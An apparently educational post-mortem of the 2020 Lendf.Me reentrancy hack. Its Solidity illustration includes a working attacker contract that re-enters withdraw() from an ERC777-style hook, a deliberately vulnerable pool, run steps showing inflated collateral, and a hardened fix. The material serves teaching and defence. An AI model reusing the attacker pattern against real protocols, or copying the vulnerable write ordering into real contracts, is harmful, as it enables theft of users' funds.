dForce / Lendf.Me Hack — April 19, 2020
Attack Overview
On April 19, 2020, Lendf.Me, the lending protocol in the dForce network, was attacked and roughly $25 million in assets were drained from its contract: 99.95% of the funds it held, about $24.5 million.
Technical Vulnerability
The attacker exploited a reentrancy vulnerability that arose from combining ERC777 tokens with a lending contract written for plain ERC20 tokens. An ERC777 transfer invokes hooks on the sending and receiving contracts (tokensToSend and tokensReceived, registered through the ERC1820 registry) in the middle of the transfer itself. That callback let the attacker re-enter Lendf.Me from inside a supply call and withdraw imBTC before the contract had written the updated supply balance to storage.
More specifically, Lendf.Me's supply function computed the user's new balance, then performed the token transfer, and only afterwards wrote the precomputed value to storage. By calling withdraw from within the tokensToSend hook, the attacker reduced the real balance and was paid out in imBTC; when the outer supply call resumed, it overwrote the record with the stale, larger value it had computed before the transfer. Repeating this inflated Lendf.Me's internal record of the attacker's imBTC collateral far beyond what had actually been deposited. The attacker then borrowed against that phantom collateral and drained nearly all stablecoins, synthetic BTC, and wETH from the platform.
Root Cause
The hack became possible after dForce allowed imBTC, a synthetic Bitcoin asset issued under the ERC777 standard, to be used as collateral on Lendf.Me. Lendf.Me's code, a fork of Compound v1, updated a user's balance only after the external token transfer and had no reentrancy guard. With ERC20 tokens that ordering was harmless, because an ERC20 transfer cannot call back into the caller; with imBTC, the ERC777 hook notification turned the latent ordering flaw into an exploitable reentrancy, allowing the attacker to create a false record of imBTC collateral within the Lendf.Me system. The hazard was not new: the same ERC777 hook reentrancy had drained Uniswap V1's imBTC pool the day before, on April 18, 2020.
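The following is an added illustration of the bug class described in the Technical Vulnerability and Root Cause sections above; it is not Lendf.Me's or dForce's code, and every contract and function name in it is invented for the example. It models an ERC777-style token that calls the sender's tokensToSend hook mid-transfer (with a simple self-registration flag standing in for the ERC1820 registry, and allowances and interest accrual omitted), a pool with the vulnerable read / external call / stale write ordering, an attacker contract that re-enters withdraw() from the hook, and a hardened pool that applies checks-effects-interactions plus a reentrancy guard.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
// Added illustration of the Lendf.Me bug class, NOT the protocol's own code.
// Simplifications (assumptions): token keeps its own sender-hook flag instead of
// querying ERC1820; allowances and interest math are omitted; names are invented.

interface ITokensSender {
    // ERC777 sender hook: the token calls it on `from` BEFORE balances move.
    function tokensToSend(address operator, address from, address to, uint256 amount,
                          bytes calldata userData, bytes calldata operatorData) external;
}

// Hypothetical ERC777-like token: a transfer calls the sender's hook if registered.
contract HookingToken {
    mapping(address => uint256) public balanceOf;
    mapping(address => bool) public senderHook;   // stand-in for the ERC1820 lookup

    constructor(uint256 supply) { balanceOf[msg.sender] = supply; }
    function registerSenderHook() external { senderHook[msg.sender] = true; }

    function _move(address operator, address from, address to, uint256 amount) internal {
        if (senderHook[from]) {
            ITokensSender(from).tokensToSend(operator, from, to, amount, "", "");
        }
        require(balanceOf[from] >= amount, "balance");
        balanceOf[from] -= amount;
        balanceOf[to] += amount;
    }
    function transfer(address to, uint256 amount) external returns (bool) {
        _move(msg.sender, msg.sender, to, amount);
        return true;
    }
    function transferFrom(address from, address to, uint256 amount) external returns (bool) {
        _move(msg.sender, from, to, amount);   // no allowance check: simplification
        return true;
    }
}

// VULNERABLE: the same read / external call / stale write ordering exploited on Lendf.Me.
contract VulnerablePool {
    HookingToken public immutable token;
    mapping(address => uint256) public supplied;
    constructor(HookingToken t) { token = t; }

    function supply(uint256 amount) external {
        uint256 updated = supplied[msg.sender] + amount;                  // 1. read old balance
        require(token.transferFrom(msg.sender, address(this), amount));   // 2. hook fires: reentrancy window
        supplied[msg.sender] = updated;                                   // 3. stale write undoes the withdraw
    }
    function withdraw(uint256 amount) external {
        require(supplied[msg.sender] >= amount, "insufficient");
        supplied[msg.sender] -= amount;
        require(token.transfer(msg.sender, amount));
    }
}

// Attacker: re-enters withdraw() from the hook fired by its own supply().
contract ReentrantSupplier is ITokensSender {
    VulnerablePool public immutable pool;
    HookingToken public immutable token;
    bool private attacking;

    constructor(VulnerablePool p, HookingToken t) {
        pool = p; token = t;
        t.registerSenderHook();   // analogue of setInterfaceImplementer() on ERC1820
    }
    // Honest deposit first so the pool holds something to hand back.
    function seed(uint256 amount) external { pool.supply(amount); }
    // Each call: the hook drains the pool, yet supply() then records old + amount.
    function attack(uint256 amount) external { attacking = true; pool.supply(amount); attacking = false; }

    function tokensToSend(address, address, address to, uint256, bytes calldata, bytes calldata) external override {
        if (msg.sender != address(token) || to != address(pool) || !attacking) return;
        uint256 record = pool.supplied(address(this));
        uint256 held = token.balanceOf(address(pool));
        pool.withdraw(held < record ? held : record);   // pool is not hooked, so this does not recurse
    }
    // Recorded collateral vs. tokens actually in the pool; the gap is the phantom collateral.
    function phantomCollateral() external view returns (uint256 recorded, uint256 actual) {
        return (pool.supplied(address(this)), token.balanceOf(address(pool)));
    }
}

// FIXED: effects before interactions, plus a reentrancy guard as defence in depth.
contract HardenedPool {
    HookingToken public immutable token;
    mapping(address => uint256) public supplied;
    uint256 private locked = 1;
    modifier nonReentrant() { require(locked == 1, "reentrant"); locked = 2; _; locked = 1; }
    constructor(HookingToken t) { token = t; }

    function supply(uint256 amount) external nonReentrant {
        supplied[msg.sender] += amount;                                   // effect first, from storage
        require(token.transferFrom(msg.sender, address(this), amount));   // interaction last
    }
    function withdraw(uint256 amount) external nonReentrant {
        require(supplied[msg.sender] >= amount, "insufficient");
        supplied[msg.sender] -= amount;
        require(token.transfer(msg.sender, amount));
    }
}
```

Deploy HookingToken, VulnerablePool and ReentrantSupplier, transfer some tokens to the attacker contract, then call seed(s) once and attack(x) repeatedly: phantomCollateral() reports a recorded balance that grows by x on every call while the pool's real token balance stays at x, which is exactly the false collateral record the text describes. Against HardenedPool the same hook hits the nonReentrant check and the whole supply() reverts; the guard is kept even though the reordered supply() alone already denies the attacker any net gain, because a fork written for ERC20 has many other external calls whose ordering would otherwise have to be audited one by one.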
Response
Under pressure from dForce and law enforcement, the attacker returned nearly all of the funds within days. dForce then published an asset redistribution plan to return assets to affected users.
Additional Sources